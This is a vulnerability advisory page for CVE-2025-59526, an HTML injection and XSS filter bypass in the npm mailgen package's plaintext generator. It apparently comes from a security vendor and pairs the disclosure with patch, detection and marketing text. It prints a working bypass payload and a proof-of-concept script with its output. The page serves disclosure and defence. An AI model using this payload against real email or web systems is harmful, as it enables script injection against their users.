Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
📦 npm
Not in CISA KEV

CVE-2025-59526 mailgen

Fix: eladnava/mailgen@741a019

CVE-2025-59526 is a Cross-site Scripting (XSS) vulnerability in mailgen. A fix is available for mailgen — see the affected versions and patch details below.

Mailgen: HTML injection vulnerability in plaintext e-mails

Also known asGHSA-j2xj-h7w5-r7vp
Published
Sep 22, 2025
Updated
Aug 12, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed
Exploitation data as of Sep 21, 2026 · OSV.dev, NVD, FIRST.org (EPSS)

Exploitation Status

No confirmed exploitation observed yet

  • CISA assesses this as automatable — exploitation doesn’t require manual, per-target effort, which raises the odds of mass scanning and opportunistic attacks.
  • CISA’s own triage has not observed active exploitation or public proof-of-concept code for this CVE as of its last assessment.

Exploitation and automatability from CISA’s SSVC triage for CVE-2025-59526.

EPSS Exploitation Probability

via FIRST.org ↗
0.4%probability of exploitation in next 30 days
Lower Risk0.00%
Lower risk than most CVEs37th percentile — riskier than 37% of all scored CVEsHighest risk

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Real-World Exposure

1 pkg affected

How broadly this vulnerability is actually deployed: weekly install volume shows current usage, and reverse-dependency count shows how many other packages break if it stays unpatched.

37other npm packages depend on this — each one inherits the vulnerability until it's patched upstream
mailgennpm
10Kdownloads / week

Description

HTML Injection and XSS Filter Bypass in Plaintext Emails

Summary

An HTML injection vulnerability in plaintext emails generated by Mailgen has been discovered. Your project is affected if you use the Mailgen.generatePlaintext(email); method and pass in user-generated content. The issue was discovered and reported by Edoardo Ottavianelli (@edoardottt).

Vulnerability Analysis

The following function (inside index.js) is intended to strip all HTML content to produce a plaintext string.

// Plaintext text e-mail generator
Mailgen.prototype.generatePlaintext = function (params) {
    // Plaintext theme not cached?
    if (!this.cachedPlaintextTheme) {
        throw new Error('An error was encountered while loading the plaintext theme.');
    }
   
    // Parse email params and get back an object with data to inject
    var ejsParams = this.parseParams(params);

    // Render the plaintext theme with ejs, injecting the data accordingly
    var output = ejs.render(this.cachedPlaintextTheme, ejsParams);

    // Definition of the <br /> tag as a regex pattern
    var breakTag = /(?:\<br\s*\/?\>)/g;
    var breakTagPattern = new RegExp(breakTag);

    // Check the plaintext for html break tag, maintains backwards compatiblity
    if (breakTagPattern.test(this.cachedPlaintextTheme)) {
        // Strip all linebreaks from the rendered plaintext
        output = output.replace(/(?:\r\n|\r|\n)/g, '');

        // Replace html break tags with linebreaks
        output = output.replace(breakTag, '\n');

        // Remove plaintext theme indentation (tabs or spaces in the beginning of each line)
        output = output.replace(/^(?: |\t)*/gm, "");
    }

    // Strip all HTML tags from plaintext output
    output = output.replace(/<.+?>/g, '');

    // Decode HTML entities such as &copy;
    output = he.decode(output);

    // All done!
    return output;
};

The process fails because it first converts HTML break tags to newlines and then attempts to strip HTML tags with a regular expression. Using a break tag inside another HTML tag can deceive the filter, allowing HTML content to be injected into the email.

A valid payload is: <img<br> src=xyz onerror=alert(1)>.

Proof of Concept

var Mailgen = require('mailgen');

var mailGenerator = new Mailgen({
    theme: 'default',
    product: {
        name: 'Mailgen',
        link: 'https://mailgen.js/'
    }
});

var email = {
    body: {
        name: 'John <img<br> src=xyz onerror=alert(document.body.innerHTML)> Appleseed',
        intro: 'Welcome to Mailgen! We\'re very excited to have you on board.',
        action: {
            instructions: 'To get started with Mailgen, please click here:',
            button: {
                color: '#22BC66',
                text: 'Confirm your account',
                link: 'secret-link'
            }
        },
        outro: 'Need help, or have questions? Just reply to this email, we\'d love to help.'
    }
};

// Generate the plaintext version of the e-mail
var emailText = mailGenerator.generatePlaintext(email);

// Optionally, preview the generated plaintext e-mail
require('fs').writeFileSync('emailText.txt', emailText, 'utf8');

Resulting output file (emailText.txt):

Hi John <img
src=xyz onerror=alert(document.body.innerHTML)> Appleseed,

Welcome to Mailgen! We're very excited to have you on board.        

To get started with Mailgen, please click here:        
secret-link            

Need help, or have questions? Just reply to this email, we'd love to help.        

Yours truly,  
Mailgen

© 2025 Mailgen. All rights reserved.

Mitigation

The vulnerability has been patched in commit 741a019 and released to npm in version 2.0.30.

Thanks to Edoardo Ottavianelli (@edoardottt) for discovering and reporting this vulnerability.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
📦npmmailgenall versions2.0.30npm install mailgen@2.0.30

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for mailgen, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.

  2. Fix

    Update mailgen to 2.0.30 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2025-59526 is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 Security's impact-aware SCA analyses which vulnerable code paths your application actually calls, so a match like CVE-2025-59526 can be triaged on real exposure rather than presence alone.

Tailored to CVE-2025-59526. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

# HTML Injection and XSS Filter Bypass in Plaintext Emails ### Summary An HTML injection vulnerability in plaintext emails generated by Mailgen has been discovered. Your project is affected if you use the `Mailgen.generatePlaintext(email);` method and pass in user-generated content. The issue was discovered and reported by Edoardo Ottavianelli (@edoardottt). ### Vulnerability Analysis The following function (inside `index.js`) is intended to strip all HTML content to produce a plaintext string. ```javascript // Plaintext text e-mail generator Mailgen.prototype.generatePlaintext = function (
O3 Security · Impact-Aware SCA

Is CVE-2025-59526 in your dependencies?

O3 Security finds CVE-2025-59526 across npm dependencies, including transitive ones, and its impact-aware SCA ranks findings by whether your code actually calls the vulnerable path.

CVE-2025-59526: mailgen XSS | O3 Security